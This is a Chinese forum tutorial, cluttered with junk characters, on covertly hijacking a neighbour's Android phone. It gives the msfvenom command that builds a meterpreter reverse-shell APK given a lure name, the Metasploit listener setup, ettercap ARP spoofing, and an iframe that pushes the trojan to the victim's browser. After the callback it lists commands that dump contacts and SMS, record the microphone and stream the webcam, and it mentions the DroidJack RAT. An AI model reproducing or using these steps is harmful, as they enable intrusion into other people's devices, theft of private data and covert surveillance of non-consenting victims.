% A+ B$ d- G( m2 B3 Q. }* u 五、msf+ettercap入侵邻居安卓手机 " L& X2 P5 `! ^3 ^" i* C/ _3 h5 `
6 Q5 F. t/ {; n" m0 t6 O! b
: {# b: P/ V" D* R
首先启动msf ( i6 ^% i4 ~1 m; i8 V
+ A: y0 @. f W4 E2 Y v' E/ P! u* y
( f2 ~: {4 b/ r* t' M* A 先用kali生成一个安卓木马,如下命令:
4 Y# c' B1 C8 ? 4 y# l9 P1 L/ g* @/ U
' q1 ~7 I' _8 \1 @' `% K7 g" U
Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 1 v1 z5 a( \$ p; X
! M m) J3 M% d4 Y
Z0 i/ P6 U6 Z. ^' O; s7 r
为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 ) \( k- |8 R7 O
+ h8 |& O, D5 ^+ r
, o2 A* L" x: ~# ]5 A! J$ p! L) O 然后进入msf 8 L: M r% V% _+ W
# w4 f% v# ~5 G0 j6 K* B# L: \+ {$ `5 O T, l" v
use exploit/multi/handler
! N: O1 R% p K0 g* d6 M
/ {1 I' a1 O3 v. f; N* b# Z! F. A% J0 r7 e# g9 m
set payload android/meterpreter/reverse_tcp
2 Q" |! G3 H0 [4 a5 g: G$ j
1 m7 M* d. M* x' ^5 ]" ]
2 W! L. D9 o) j7 H' L1 V4 V set LHOST 192.168.0.109 //ip为kaili的ip 7 F% B* T. J, }& V) K
; C' M; G% @4 Y, p9 B
" ]8 X% \+ `+ c# z8 c# {7 C
set LPORT 44444 //端口一定要与前面生成的木马的端口一致
* v D8 G7 W# s5 z# G4 f' O7 f 5 K2 n- a" _/ \ J3 ] g4 \
% T7 [0 \) b N, X$ ]) W: ^# \ Exploit 5 ]: y: A7 u" q: V9 q& E7 M
/ g% K: G/ s& i! A* B+ |! a/ \- b5 u5 E
/ @/ d1 D5 d8 O1 d2 ]
9 r" h8 u& C) u, W B7 E
6 _, y3 C& Z, w" V7 Z4 B# U# V, { 下面我们开启ettercap -G ) _9 f( x, X# X
4 v u Z6 z1 R6 I, {
) w3 N' l* w4 \ 我物理IP为
4 I- M! x5 F5 P6 U7 o4 | 7 u b3 @8 z$ G6 K: s
, F9 N) {/ [5 L/ T) U: x
1 e" n+ r. {( e6 z( l, \
2 ]( V/ ]: M, E) m: P
0 D5 t$ N k1 P; _ 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, : N! R' G1 L! \
/ a' _% e8 m' h* o1 L
5 B) S) W! H2 K. r% b) ]
下面我们来设置一下 ' D5 b9 ^3 s" \ F: F
4 X% P9 Y) c4 q
5 v* Q" j$ u, v4 O" A. i) i & g" j4 f& P+ M8 T2 P% a) N5 T7 {
2 ]# \$ c. N7 T* l w8 Z% r& |4 E. _- V4 p w3 \
在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了,
* j/ Y% T: }" D( H( {, D+ R
: H4 e9 |9 \ ^1 O. V9 ], J' z( e9 m
; E1 D9 u3 b1 s! v2 r6 F- T4 \ : T5 |$ I& b- s* P' y# A
2 h: A- R7 j5 d* W+ [, Y, U- Q
3 m( W1 N% F( i3 f6 |/ U% m! P0 D, l - D5 i+ ~ c8 I i( y# D! D
: f y5 E8 u; z7 Y
I4 o5 {$ t% @' a: c8 ~% S
( |& z: [7 n, [% O B! F& y0 D : o! h5 k- v4 u6 ?! k
7 W! k/ h' n3 |& }: U: N N: L' L$ b0 M7 p) p' E5 p& Q
0 J& H0 I K V5 c. s; n5 s8 M% |/ {; {, }
. ~2 F A7 [ a& ~% J
7 B1 j) q! u0 R# E
; ~9 g! r# ^, o8 M* x
5 G6 m; z, f% O4 Y4 f ( ~5 V3 G7 b, ?0 \ J
( F( V l$ e8 [! T* k M , {" N, ~- f4 e5 X3 z; l
9 C5 I. u9 K8 V0 A
4 j6 D5 J9 b# @4 g
5 p$ E6 j ?! r1 Z- q# B5 U% C
5 {' ?3 |/ v: Q1 R1 I, y% d
: B* G1 {4 P7 `( h, E
5 W, c5 N* ], S5 Q9 \5 ~ 0 G1 ^7 Q" u7 m6 _- K
5 X3 U4 @/ Z3 X; T6 d3 u- R3 N
1 A: |& d9 Q I, M
0 p/ b0 h m8 ~0 Z3 l9 {
: o+ U7 A T3 k+ F$ l2 d/ M, l5 ?2 Z8 O
0 j' W4 g* ~- {7 C# A
/ ^& J# M% _" h# ~# Q2 r h- o, L
' I' e, y: ^# f, a3 _- u& x" ?
# q6 ^1 J4 |& T# Y( w/ s$ J H6 I1 V* P4 R0 C' p& c) F
+ w# i9 B) @+ j$ y
+ M W3 F+ Z/ q$ P
; f2 t" M5 e2 B4 O" F 下面我们开始攻击
5 B/ A- u1 g5 Q+ w2 M $ t9 e" v0 \: ]" t2 c$ D+ m5 h: L
; a4 o- n2 t! Y- y a1 g# J
6 v: j5 n3 E, W M+ a6 v 5 |/ {+ ^0 n0 b3 w
Z' N! F# b5 E }. o
( g$ @- B. x% L9 I3 _! o ; j- w) q0 o+ P4 {+ S
" m ?" S8 b' h6 Y
8 T9 W; L) D' x# b, F
' A1 @( D+ r" Z* A3 m6 d$ t$ Y$ C( o! K) _& V9 e5 a- e
; Z- K# ^$ q) R" F) {( \# o" X 3 u( i: @ y9 k9 `. Y, w9 i
7 j4 `& o2 p* b
4 U* a: q5 ]* ?) T; d$ t
$ Z9 t/ w) z8 O5 b
5 m c4 e6 r, ^$ k) g
大概过了5分钟多,发现反弹成功了 + p/ R3 b2 Z" @9 T
. {. ^. d {3 K- X: @% F& v; n3 x% Z a1 C; C3 \
" X/ l5 n( `/ m- o6 c& `
, h9 r+ T' A6 w9 ]/ E0 B% O. O
& _& | I9 ~: U- c2 n6 a0 |3 v
5 v' n' b6 ?. `1 X $ k/ j8 t0 S# u' H
% Y) f& \. w" u1 p; j% V
' J z5 V, r3 T' S: W5 X- I ; w) Z3 `7 j+ v2 V/ p
* i/ n& E- d* A) G' j6 J* d
& S3 d _2 a: ?9 L ( x9 L6 l p5 L$ Y
5 d& k" b( [& A, J( e
( `' p! {' l0 l) E6 z / z( v+ m) J8 \' v) J( A+ M
5 l. E5 k, y) [1 |
3 S$ v8 M8 Z* w
- j/ K3 L- N, t" o( x8 u" \: H9 W7 g( ? G
) A |( E' q4 T H' X0 x! w1 `
+ [% g1 |1 `$ |& k* H. V4 z: y5 r. y2 d8 i6 ^; H0 U# X# T
执行命令 & a1 X9 O" Y+ v5 g$ K
7 i g9 u& U* x/ z6 z* m
X# S: h+ E9 x" p , M& W. K: S/ W# a# w) T0 ]
2 f9 I; g9 T5 R- B0 \, M
9 @$ _, I, c& _
dump_contacts --》这个是导出电话 7 q! I) f! Z( w' V. A& v
- q8 @* { y2 v2 ^
# n" `% ?8 M7 x4 W- T7 l) T dump_sms --》这个是导出信息
% j( b' \! ~& x0 N2 q( B! H
/ r7 [8 i1 y* |% M+ _
- l9 h9 E4 c# L) t" @ record_mic Record audio from the default microphone for X seconds 9 [8 C- H9 l( O( e' I( `# X
1 ]. ?4 N; W' j2 N1 M5 O2 n8 u3 T/ d1 H! c4 L
7 } ~, u9 D4 U8 Y1 r webcam_chat Start a video chat
0 F" r+ {+ c5 [# p5 [4 f- v) v 6 j( [+ Q2 ]! X0 ]# J) e
( }* s9 ]: [, Q5 Y webcam_list List webcams . [0 M- Y* Y' h( R
& o2 p% ^: Y2 Y# Z
& }7 _/ D0 A: |" t
webcam_snap Take a snapshot from the specified webcam
7 C: L0 e6 I8 c
4 @# O- S% t5 r5 o' D/ {5 _7 D7 n- ]4 N$ c( Q
webcam_stream   lay a video stream from the specified webcam ) K+ r; G5 O L: X8 x f$ a: x
" T" o$ _, v/ F/ Y0 g L1 o% j
$ z- J1 O) o( k& R. u. Y! I ! y Z3 T/ S+ R. _1 ~( ]
% j& J- u% Q$ K1 V
& d0 ]; A' H7 ^3 Q
& E& c+ Q9 f9 s$ g " \" u3 e6 o+ ^1 z; q9 }0 I: ?
( R9 {% j* T* @4 x2 E1 p: U$ m 我们打开看一下电话薄,
% @$ V, @, d! G1 A, p( ] ( e) h! e9 l6 d6 o& l/ @6 X6 Q
; n0 D" P, [' |# d
% P/ D6 @/ N) u: ]9 E" W. n6 T0 Y% r ( t1 c$ D# }# u( L& |
3 W9 L: V1 A" j# _
9 n1 o0 X* M! i1 C+ j# k0 I( F- y
" c; }7 \ J& k. P+ [# v7 i5 d4 r! h+ I
5 u3 l( k& O ?+ E! S2 A/ k
h; p! x1 F. r$ ]
& O( h4 c$ }& H g% ? G2 c7 C
& C- z$ S! S$ G- K& ]
! F$ }* R4 I$ c Y; W m
( D3 S0 a2 C: Q/ R7 |- {
2 \1 z& E8 a" a% p r; L4 V" W2 m$ ^
4 G9 @, V7 P: x
! X0 ]1 c9 J$ u' J. v , [/ P/ a8 I% k, L) E9 r; v+ x# [; [
3 m( T. H5 Q I4 J6 Q# y# H' ~# H
2 x+ {4 t% u2 s0 C) w 我们同时欺骗成DroidJack木马,使用方法如图:
6 ?; D! u" f, f* @5 ~2 [ ( P% Q8 }* X. Q9 a* l( J
U% K1 e4 V! B6 q' S
, R* D. R( i; H7 ~# R; a
- I& x. O( l: T" D; z1 w* |% D% x% {. `5 C' T- L1 ?" i
3 N- J' s( Z; }) }7 w $ n: H3 N. J3 W$ D
1 ^* @1 m2 I1 Q* Y' I f6 G; [" f
6 j: W: @3 c" m5 V! M; N( F+ s . d7 W7 r1 y+ U. V+ a% ]
% D* D, j( E% |. A+ P w6 k 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 ! E" e7 n& ~) i4 E9 c- v
( O9 s: y) x6 c {/ M* t# Y5 j
, k$ c0 H2 ^8 |0 h! c 1 M2 G8 g$ w, x! E+ x3 {: v4 T
- O* N/ E: ?5 b
* S9 r" P4 H O+ z
3 R5 b7 x& _ V- w 5 j: W0 e$ q/ x6 C4 I( C# [# K C
& x4 T: |7 Z l1 o% T. ^4 r
3 b: u' Z0 l& _% P4 O1 ^, U* G6 _
/ T) w# N8 I( G6 \) Z2 c$ y
6 `4 d1 Z+ O a! ?  + Q: C1 B% h$ k5 T9 b% c
- }' [) t9 N% U6 i9 s3 r
3 c* r4 U: C& A7 `0 V* g7 a ' e# {9 i E( t# e7 ^
|